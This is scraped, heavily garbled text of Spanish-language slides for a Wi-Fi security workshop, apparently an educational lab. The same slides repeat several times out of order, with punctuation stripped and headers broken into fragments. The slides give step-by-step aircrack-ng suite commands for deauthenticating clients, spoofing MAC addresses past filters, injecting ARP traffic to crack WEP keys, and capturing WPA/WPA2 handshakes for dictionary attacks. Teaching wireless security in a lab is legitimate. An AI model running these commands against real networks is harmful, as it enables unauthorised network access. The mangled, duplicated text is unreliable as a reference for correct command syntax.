bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
